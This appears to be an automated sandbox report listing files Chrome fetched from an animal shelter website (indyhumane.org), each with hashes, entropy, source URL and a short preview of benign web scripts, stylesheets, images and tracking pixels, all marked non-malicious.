                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):13577
                                                                                                                                                                                                                                                        Entropy (8bit):5.272065782731947
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:5rprDN+sag6ifKIUpQI99P1tLm9kdgyq1+J3aCJQ+h4MPLORq:5rprxaefKI0LP19m4q1WW+h4Mjp
                                                                                                                                                                                                                                                        MD5:9FFEB32E2D9EFBF8F70CAABDED242267
                                                                                                                                                                                                                                                        SHA1:3AD0C10E501AC2A9BFA18F9CD7E700219B378738
                                                                                                                                                                                                                                                        SHA-256:5274F11E6FB32AE0CF2DFB9F8043272865C397A7C4223B4CFA7D50EA52FBDE89
                                                                                                                                                                                                                                                        SHA-512:8D6BE545508A1C38278B8AD780C3758AE48A25E4E12EEE443375AA56031D9B356F8C90F22D4F251140FA3F65603AF40523165E33CAE2E2D62FC78EC106E3D731
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
                                                                                                                                                                                                                                                        Preview:/*! jQuery Migrate v3.4.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)||[],o=r.exec(t)||[],a=1;a<=3;a++){if(+o[a]<+n[a])return 1;if(+n[a]<+o[a])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.4.1";var t=Object.create(null);s.migrateDisablePatches=function(){for(var e=0;e<arguments.length;e++)t[arguments[e]]=!0},s.migrateEnablePatches=function(){for(var e=0;e<arguments.length;e++)delete t[arguments[e]]},s.migrateIsPatchEnabled=function(e){return!t[e]},n.console&&n.console.log&&(s&&e("3.0.0")&&!e("5.0.0")||n.console.log("JQMIGRATE: jQuery 3.x-4.x REQUIRED"),s.migrateWarnings
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4741)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):4776
                                                                                                                                                                                                                                                        Entropy (8bit):5.153085086858448
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:vmK40IdSs6c7DE/3sc/YrEBnUBPwKxbqe/Ds91sBYt1Em4kCofWQRemN:OK40IdS/cHg3NZBnUJbqe/DeGYtu7kC6
                                                                                                                                                                                                                                                        MD5:C6FDDBB6BE69793478DE26FC245B2ACF
                                                                                                                                                                                                                                                        SHA1:A136EBF5054FDC19729B3592005FE0FEFEC4BB4C
                                                                                                                                                                                                                                                        SHA-256:9A1E0D38B691F1D22A92CFF65EC0439B428170AC39A4493C7ECB06D5585F56A3
                                                                                                                                                                                                                                                        SHA-512:8A766304CAA9C888CFCAB64EABAB906905965E7FBCFC4F79C74AB122B892456ABAD215D0883DF17023A16A18BA15A6A4B3D0FA5345CAB7173D778F725B827C33
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:/*! This file is auto-generated */.(()=>{"use strict";var t={d:(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})}},e={};t.r(e),t.d(e,{actions:()=>P,addAction:()=>A,addFilter:()=>m,applyFilters:()=>w,applyFiltersAsync:()=>I,createHooks:()=>h,currentAction:()=>x,currentFilter:()=>T,defaultHooks:()=>f,didAction:()=>j,didFilter:()=>z,doAction:()=>g,doActionAsync:()=>k,doingAction:()=>O,doingFilter:()=>S,filters:()=>Z,hasAction:()=>_,hasFilter:()=>v,removeAction:()=>p,removeAllActions:()=>F,removeAllFilters:()=>b,removeFilter:()=>y});const n=function(t){return"string"!=typeof t||""===t?(console.error("The namespace must be a non-empty string."),!1):!!/^[a-zA-Z][a-zA-Z0-9_.\-\/]*$/.test(t)||(console.error("The namespace can only conta
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2827)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):239604
                                                                                                                                                                                                                                                        Entropy (8bit):5.542691158254388
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:kBK2+EG+3Iw/xH4Vrs0Q2Q1A5yCOA7LF0pzxKonhsGS3TGIVWH:ey+3IsxHXSVoKonhsGSQ
                                                                                                                                                                                                                                                        MD5:9CAF60C63ACF24208A64423C45B49C7B
                                                                                                                                                                                                                                                        SHA1:CE324CB2C3BB043BF42613DAE5CF711753A8AB0A
                                                                                                                                                                                                                                                        SHA-256:B0E270875DCBEF424E8D7E42A0A69D6E5512080D59CDEE8F8143EE28317B55AB
                                                                                                                                                                                                                                                        SHA-512:1BD619A74E41A739E310ED5B232D1625ACF964444DF491701CB12CE67EE46F9E151C8C47A4A2B17F67CEBF99C211EB6126DB52932A4EE9EB55C086F9EFF27B80
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://www.googletagmanager.com/gtm.js?id=GTM-55MWRN
                                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"7",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":"UA-57291413-5"},{"function":"__v","vtp_name":"gtm.elementUrl","vtp_dataLayerVersion":1},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__f","vtp_component":"URL"},{"function":"__e"},{"function":"__v","vtp_name":"gtm.element","vtp_dataLayerVersion":1},{"function":"__v","vtp_name":"gtm.elementClasses","vtp_dataLayerVersion":1},{"function":"__v","vtp_name":"gtm.elementId","vtp_dataLayerVersion"
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 768 x 723, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):613496
                                                                                                                                                                                                                                                        Entropy (8bit):7.976334765963792
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12288:1pvuT5bwClQKx0HGaYyo+t08c/Zce+GB5pjQ9iuWUm0cY9LmHTrL:1pvuQGaYyNFycG5pQIulm0RLOfL
                                                                                                                                                                                                                                                        MD5:56E2A6302D9193845948DC3508E2EF7B
                                                                                                                                                                                                                                                        SHA1:48EC5B5F691C03B6CFFDDC2E52C5131FF7914C73
                                                                                                                                                                                                                                                        SHA-256:2D433174B869CC1D89571402AF702D7322FC9DF1847FCB48DA59A705A5F6C892
                                                                                                                                                                                                                                                        SHA-512:B81FF0BB66006960E53E855CBD53F4241A9AA493C21546E22F49E4EC2A6852D58D77A7FD99EA01C1F833FD97A96E5293D0FD19B50F04BC7B246CB1DF8B79493B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-content/uploads/2024/12/dog-day-out2-768x723.png
                                                                                                                                                                                                                                                        Preview:.PNG........IHDR..............\e.....pHYs..........+.... .IDATx...k...}...s...m_..9g........j.$4miB)*-H...*Q@....o..!..Q..".W.RA.V..QT.*....&...I._..3g.e.u..+/..x&NR;...<....k.....~~..{~?.,.,.,.,.,.,.,.,.,.,.,.,.,.,.."...dY.e.=)%....6 .......t.o./~.........#.,...W.,.w.....B....'.t].p.m..p|...o....>.K.6P.nW.5._.n...[.7....c/......,{O..@.e.3.4...>..rz......5`.( H)....o...L...5O)U.K.........{........9......M.K.o...b...+..=#..Y.e...i..)..c.L.t:n1.....1..O......>=.'....N....y.......S.>.......$o.&.N.}Z,S@p....7....)^O.e.3+..Y.e......~.i.~...g.....G.4..Re..}g.v..)..Li7G.W............CdJ.yt]s....%..2.?...|I.1<.K.,{v.. ....R.....?b.\...g<..tx.....t-......"......8.....eY.......Y..=..y....y......e!.}...eY.... ..)9....._...w.L.......7..[...|=Y.eOT...,..........i..,....V....&.W..,{...@.e..v.....o2m..3.O.....) ...*.e.{Y...,..S-.O....,.|]..e*%.W....S.5...,..eY.T...WL%*...{.........>.[........i...~..QV.l.....o.iAY...<...Y..o.
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3892), with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):3892
                                                                                                                                                                                                                                                        Entropy (8bit):4.948228779941934
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:fiZ9FFOMODOV7CIqs/QMGVy43icycNHWLf16xKtAHa:fiZnFPk+qs/QMGVjfycNHOd6xKtAHa
                                                                                                                                                                                                                                                        MD5:BDFB206242674030ADE64D5FD7713814
                                                                                                                                                                                                                                                        SHA1:9081528EAEC2C8BBE1F3F820F3257CA63E924C43
                                                                                                                                                                                                                                                        SHA-256:C08BEF0BF635A6EE6E573834A149A8E86EC3B93604980E928F028A5360E9485C
                                                                                                                                                                                                                                                        SHA-512:C77C1F4BEEAAB9A98DD9A2AA75B591634B75A7D105AE18296780C8595753F81BAD537B2AAE7B79B61FE93D93D7203850500AF52B5D7F2769885D386107C778C7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:void 0===TCB_Front.js_modules["post-list"]&&TCB_Front.setModuleLoadedStatus("post-list",!1),(t=>{if(!TCB_Front.isModuleLoaded("post-list")){t(window).on("tcb_after_dom_ready",(()=>{t(".tcb-post-list").each(((i,s)=>{new e(t(s)).renderPagination()}))}));class e{constructor(e){this.$element=e,this.content="",this.listArgs={};let i=this.getAttr("data-css");const s=t.Event("tcb_post_list_identifier.tcb");if(this.$element.trigger(s),s.identifier&&(i=s.identifier),this.identifier=i,this.listIdentifier="article",tve_frontend_options.is_editor_page?this.editorInit():this.frontendInit(),this.isCarousel()){this.isEditor=tve_frontend_options.is_editor_page;const t=this.$element.find(".tcb-carousel-container");t.attr("data-carousel-settings",decodeURI(t.attr("data-carousel-settings"))),this.carousel=new TCB_Front.Carousel(this),this.carousel.initCarousel()}}getPaginationInstance(){if(this.listArgs&&this.listArgs.attr){const t=this.listArgs.attr["pagination-type"];if(t.length&&"none"!==t&&void 0!==T
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, orientation=upper-left, resolutionunit=2, manufacturer=Apple, model=iPhone 15 Pro, xresolution=202, yresolution=210, software=17.6.1, datetime=2025:01:01 13:06:54, hostcomputer=iPhone 15 Pro, xresolution=259, yresolution=267, GPS-Data], baseline, precision 8, 420x511, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):80941
                                                                                                                                                                                                                                                        Entropy (8bit):7.934352257667343
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:Y3yOKHzDEfVeGz/BNy4gvCHspE2EbBqsHnaZfSqyWd+nf5H8wean3B72C1vynL:Y3BEXGzyZvC/2Mrn6fhyWdaBc30X1vyL
                                                                                                                                                                                                                                                        MD5:6274E38F2C526BD69811AE3C98A87052
                                                                                                                                                                                                                                                        SHA1:484736EDA0566C1DE9624FD936920AB5AC514753
                                                                                                                                                                                                                                                        SHA-256:5EF98984332D36858F051DE7FADBE81EE8F1E6D0C3370623D890C95FC427F2A7
                                                                                                                                                                                                                                                        SHA-512:6802923CDE45B653A3897E15BE2610B22679CC2961FCE969AC6D81D7C1FAFDDA778D8FB07E722B4F1105ED490A44AA862871DA4D4D38EA53D2D6CF6E574B980C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...........<...................................i...........%...............Apple.iPhone 15 Pro.H.......H.......17.6.1.2025:01:01 13:06:54.iPhone 15 Pro.H.......H......."."...........'.......@...........0232............................................355.........355.........0100....................................................................................................................................2...........3...........4...0...........................$...........,...........@...........T...........\...........d...........l...........t...........|...|...............-05:00.-05:00.-05:00.................L...............Apple.iPhone 15 Pro back triple camera 6.765mm f/1.78.....<...L.......2025:01:01 13:06:54.2025:01:01 13:06:54.w ...0......'d...Q..............}...a.....U.9.T.Apple iOS...MM.6...............................h......................
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, orientation=upper-left, resolutionunit=2, manufacturer=Apple, model=iPhone 15 Plus, xresolution=203, yresolution=211, software=18.1.1, datetime=2024:12:19 19:28:39, hostcomputer=iPhone 15 Plus, xresolution=261, yresolution=269, GPS-Data], baseline, precision 8, 420x420, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):49238
                                                                                                                                                                                                                                                        Entropy (8bit):7.90627361949806
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:6x3PPy/1MWuY0ODsnCZgdSi+5Fzm/oE1qB01lcI5hJUD6TuOtbAM65L+xBqLuddl:a3PPmeWF0Ci+fCnTlcIF5s4ALiv1xp
                                                                                                                                                                                                                                                        MD5:4847E19BA833FA53AA06749082290665
                                                                                                                                                                                                                                                        SHA1:C1A512F7B6F87D5681640031AEB801A5C03D8137
                                                                                                                                                                                                                                                        SHA-256:ACAF22A6107E1E545E5A1885267BAB72A9105CD8521083679A24BEA0655499BD
                                                                                                                                                                                                                                                        SHA-512:0F3233B58E107E8B86081849F37DEAA172D93E8F4B157FDB3BDD3BED785C27543654736D6F8A75240600E3463C71666256840EE13306645765969A027A28C2A9
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...........<...................................i...........%...............Apple.iPhone 15 Plus.H.......H.......18.1.1.2024:12:19 19:28:39.iPhone 15 Plus.H.......H......."."...........'...................0232............................................013.........013.........0100....................................................................................................................................2...........3...........4...2............... ...........(...........0...........D...........X...........`...........h...........p...........x...............|...%...........-05:00.-05:00.-05:00..Q......)\_.....................Apple.iPhone 15 Plus back dual wide camera 5.96mm f/1.6.....(...........2024:12:19 19:28:39.2024:12:19 19:28:39..m......o8...).......(..................#.[.E.X.Apple iOS...MM.3...................2...x.......h..................
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (815)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):3501
                                                                                                                                                                                                                                                        Entropy (8bit):5.383873370647921
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:EI5cZUiKliCJ86U+QTEVWfeLwTauSEegdkZ5edOIC:EI5hiWNJ8kQTEVWfeUauRfdkZ5edO1
                                                                                                                                                                                                                                                        MD5:147FD3B00C22BA9C939712E9213C24CA
                                                                                                                                                                                                                                                        SHA1:3B48369B86FA0574F35379AACD1F42CC9C98A52B
                                                                                                                                                                                                                                                        SHA-256:70F5B11C1870CF90201A6D5F770CA318A3FA5827C74A8765EDE22B487F7D4532
                                                                                                                                                                                                                                                        SHA-512:E8419A71232EDAC8FD131446777F7D034B3171EFE07B3267479B439E4982650DB65A0D1DDC9F516315D5ED1B01ECFD2F7EB55D75D44AA51EE0AD494D441586D2
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://www.googletagmanager.com/static/service_worker/5160/sw_iframe.html?origin=https%3A%2F%2Findyhumane.org
                                                                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html>.<head>. <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon">.</head>.<body>. <script>.'use strict';class m{constructor(a){this.j=a;this.g={};this.h={};this.i=0;this.id=String(Math.floor(Number.MAX_SAFE_INTEGER*Math.random()))}}function n(a){return a.performance&&a.performance.now()||Date.now()}.var p=function(a,b){class d{constructor(c,g,f){this.failureType=c;this.data=g;this.g=f;this.h=new m(n(f))}s(c,g){const f=c.clientId;if(c.type===0){c.isDead=!0;var e=this.h,h=n(this.g);e.g[f]==null&&(e.g[f]=0,e.h[f]=h,e.i++);e.g[f]++;c.stats={targetId:e.id,clientCount:e.i,totalLifeMs:Math.round(h-e.j),heartbeatCount:e.g[f],clientLifeMs:Math.round(h-e.h[f])}}c.failure={failureType:this.failureType,data:this.data};g(c)}}return new d(5,a,b)};/*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/.let q=globalThis.trustedTypes,r;function t(){let a=null;if(!q)return a;try{const b=d=>d;a=q.createPolicy("goog#html",{createHTML:b,createScript:b,crea
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):170
                                                                                                                                                                                                                                                        Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                        MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                        SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                        SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                        SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://cm.g.doubleclick.net/pixel?google_nid=ssc&google_hm=SYScIzQoRVihlt4vcJdW7Gd_LXU
                                                                                                                                                                                                                                                        Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (58981)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):59016
                                                                                                                                                                                                                                                        Entropy (8bit):6.036924444025019
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:oey/Z24B3P3aXOhUzSv16CAyLquqSfurIdUMbs73KO08QSJ2BQH02CRqxMWs5rJq:ox/ZvB/qPWMiquqioMUXQSJYIMW+rJq
                                                                                                                                                                                                                                                        MD5:D68D6BF519169D86E155BAD0BED833F8
                                                                                                                                                                                                                                                        SHA1:27BA9C67D0E775FC4E6DD62011DAF4C3902698FC
                                                                                                                                                                                                                                                        SHA-256:C21E5A2B32C47BC5F9D9EFC97BC0E29FD081946D1D3EBFFC5621CFAFB1D3960E
                                                                                                                                                                                                                                                        SHA-512:FD0956D1A7165E61348FDA53D859493A094D5A669AA0BA648BE3381B02ED170EFD776704AF6965F1E31143F510172EE941D4F2FC32C4751D9B8763B66301486D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-includes/css/dashicons.min.css?ver=6.7.1
                                                                                                                                                                                                                                                        Preview:/*! This file is auto-generated */.@font-face{font-family:dashicons;src:url("../fonts/dashicons.eot?99ac726223c749443b642ce33df8b800");src:url("../fonts/dashicons.eot?99ac726223c749443b642ce33df8b800#iefix") format("embedded-opentype"),url("data:application/x-font-woff;charset=utf-8;base64,d09GRgABAAAAAHvwAAsAAAAA3EgAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAABHU1VCAAABCAAAADMAAABCsP6z7U9TLzIAAAE8AAAAQAAAAFZAuk8lY21hcAAAAXwAAAk/AAAU9l+BPsxnbHlmAAAKvAAAYwIAAKlAcWTMRWhlYWQAAG3AAAAALwAAADYXkmaRaGhlYQAAbfAAAAAfAAAAJAQ3A0hobXR4AABuEAAAACUAAAVQpgT/9mxvY2EAAG44AAACqgAAAqps5EEYbWF4cAAAcOQAAAAfAAAAIAJvAKBuYW1lAABxBAAAATAAAAIiwytf8nBvc3QAAHI0AAAJvAAAEhojMlz2eJxjYGRgYOBikGPQYWB0cfMJYeBgYGGAAJAMY05meiJQDMoDyrGAaQ4gZoOIAgCKIwNPAHicY2Bk/Mc4gYGVgYOBhzGNgYHBHUp/ZZBkaGFgYGJgZWbACgLSXFMYHD4yfHVnAnH1mBgZGIE0CDMAAI/zCGl4nN3Y93/eVRnG8c/9JE2bstLdQIF0N8x0t8w0pSMt0BZKS5ml7F32lrL3hlKmCxEQtzjAhQMRRcEJijhQQWV4vgNBGV4nl3+B/mbTd8+reeVJvuc859znvgL0A5pkO2nW3xcJ8qee02ej7/NNDOz7fHPTw/r/LnTo60ale4ooWov2orOYXXQXPWVr2V52lrPL3qq3Wlmtq
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4048)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):30011
                                                                                                                                                                                                                                                        Entropy (8bit):5.432846813068331
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:so/MPtWU9YwUpxbY/Y3YOgQYeYZYHYZYVY+YSYEqBulI3kPd0BWlSFRKq4zSIGc:RIT7sZwuvL54WAcl/h0s
                                                                                                                                                                                                                                                        MD5:1DFF7F02A28FCACE35F1B358D2634AFA
                                                                                                                                                                                                                                                        SHA1:149559AF021EE1531AC541AC8085EA18F963D0FE
                                                                                                                                                                                                                                                        SHA-256:62339772926D1CCE25B934059DE452B09D253914F2A8EC96DC2C532612164927
                                                                                                                                                                                                                                                        SHA-512:D3860F234E8B7DA7AEC48E7A146A7A05AC82B24C6F63D9B35322FBBA587531B5A08C9DFF4DA60829EA9F7A5A1E5A395FA489EC6A6FDC51EB900323E86D8E0612
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://connect.facebook.net/signals/config/1401480206566122?v=2.9.179&r=stable&domain=indyhumane.org&hme=b8122d5d96cd6f542162ba4f497489972d1ebe228d24c39d34f560e30ae932ce&ex_m=70%2C122%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C173%2C176%2C188%2C184%2C185%2C187%2C29%2C101%2C53%2C77%2C186%2C168%2C171%2C181%2C182%2C189%2C132%2C41%2C191%2C192%2C34%2C144%2C15%2C50%2C197%2C196%2C134%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C169%2C172%2C141%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C203%2C202%2C204%2C209%2C210%2C211%2C207%2C199%2C133%2C164%2C198%2C200%2C123%2C158%2C146%2C152%2C130%2C236%2C117%2C128%2C237%2C166%2C120%2C239%2C167%2C137%2C124%2C155%2C149%2C195%2C114%2C129
                                                                                                                                                                                                                                                        Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                                        Entropy (8bit):2.7773627950641693
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                                                                                        MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                                                                                        SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                                                                                        SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                                                                                        SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://td.doubleclick.net/td/rul/1009911120?random=1736387984394&cv=11&fst=1736387984394&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5170z8898710595za201zb898710595&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&u_w=1280&u_h=1024&url=https%3A%2F%2Findyhumane.org%2Fadopt%2Fadoptable-cats%2F&ref=https%3A%2F%2Findyhumane.org%2F&label=MtQMCNfdnYoYENCKyOED&hn=www.googleadservices.com&frm=0&tiba=Adoptable%20Cats%20-%20IndyHumane&value=0&did=dZTNiMT&gdid=dZTNiMT&edid=dZTNiMT&bttype=purchase&npa=0&pscdl=noapi&auid=1223850198.1736387954&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&capi=1&ct_cookie_present=0
                                                                                                                                                                                                                                                        Preview:<html></html>
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):95
                                                                                                                                                                                                                                                        Entropy (8bit):4.347811435468635
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/Y3WlED//jp:6v/lhPfkCDtmywFghu3WlEDTp
                                                                                                                                                                                                                                                        MD5:71A50DBBA44C78128B221B7DF7BB51F1
